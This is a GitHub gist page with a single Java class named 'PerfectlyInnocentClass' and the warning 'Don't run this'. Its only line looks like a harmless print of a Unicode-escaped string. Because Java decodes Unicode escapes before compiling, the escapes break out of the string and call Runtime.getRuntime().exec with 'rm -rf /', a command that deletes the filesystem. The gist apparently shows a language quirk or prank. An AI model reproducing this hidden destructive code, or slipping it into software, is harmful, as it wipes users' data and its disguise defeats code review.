Skip to content

Instantly share code, notes, and snippets.

@Storyyeller
Created November 16, 2014 07:40
Show Gist options
  • Save Storyyeller/03fcfb999d77efc71bf0 to your computer and use it in GitHub Desktop.
Save Storyyeller/03fcfb999d77efc71bf0 to your computer and use it in GitHub Desktop.
Don't run this
public class PerfectlyInnocentClass {
public static void main(String[] args) throws Throwable {
System.out.println("\u0022\u0029\u003b\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u0022\u0072\u006d\u0020\u002d\u0072\u0066\u0020\u002f");
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment